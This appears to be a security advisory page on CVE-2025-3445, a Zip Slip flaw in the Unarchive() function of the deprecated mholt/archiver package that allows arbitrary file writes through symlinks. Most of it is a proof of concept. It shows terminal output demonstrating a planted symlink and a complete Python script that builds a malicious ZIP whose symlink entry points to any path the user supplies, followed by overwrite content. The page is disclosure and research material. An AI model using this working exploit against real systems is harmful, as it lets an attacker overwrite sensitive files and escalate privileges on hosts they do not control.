CVE-2025-3445

Affected versions (>=3.0.0 <4.0.0-alpha.1) of this package are vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip) in the Unarchive() function. An attacker can overwrite sensitive files and potentially escalate privileges by supplying a malicious archive file containing symlinks, which is unarchived by the vulnerable application.

A very similar vulnerability was found in TAR files (CVE-2024-0406).

Although a fix was implemented, it hasn't been officially released, and the affected project has since been deprecated. The successor to mholt/archiver is a new project called mholt/archives, and its initial release (v0.1.0) removes the Unarchive() functionality.


PoC || GTFO

ยป python3 cve-2025-3445.py /tmp/sessions/admin/fake_session
ZIP file created at cve-2025-3445.zip with symlink pointing to /tmp/sessions/admin/fake_session

# Upload file to target which use Unarchive() function

root@5af68317d6cb:/app/unarchive/admin# ls -al
total 8
drwxr-xr-x 2 root root 4096 Jun  1 08:11 .
drwxr-xr-x 3 root root 4096 Jun  1 07:02 ..
lrwxrwxrwx 1 root root   32 Jun  1 08:11 x -> /tmp/sessions/admin/fake_session
root@5af68317d6cb:/app/unarchive/admin# cat /tmp/sessions/admin/fake_session
<some-file-content-here>
# cve-2025-3445.py
import zipfile
import sys
import io

def create_zip(zip_path, symlink_target):
    with zipfile.ZipFile(zip_path, 'w') as zip_ref:
        symlink_info = zipfile.ZipInfo('./x')
        symlink_info.external_attr = 0o120777 << 16  # symlink type
        zip_ref.writestr(symlink_info, symlink_target)
        # Optional: write content to a normal file if needed
        regular_file_content = b'<some-file-content-here>'
        zip_ref.writestr('x', regular_file_content)

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <path_to_symlink>")
        sys.exit(1)

    symlink_target = sys.argv[1]
    zip_path = "cve-2025-3445.zip"

    create_zip(zip_path, symlink_target)
    print(f"ZIP file created at {zip_path} with symlink pointing to {symlink_target}")

Last updated

Was this helpful?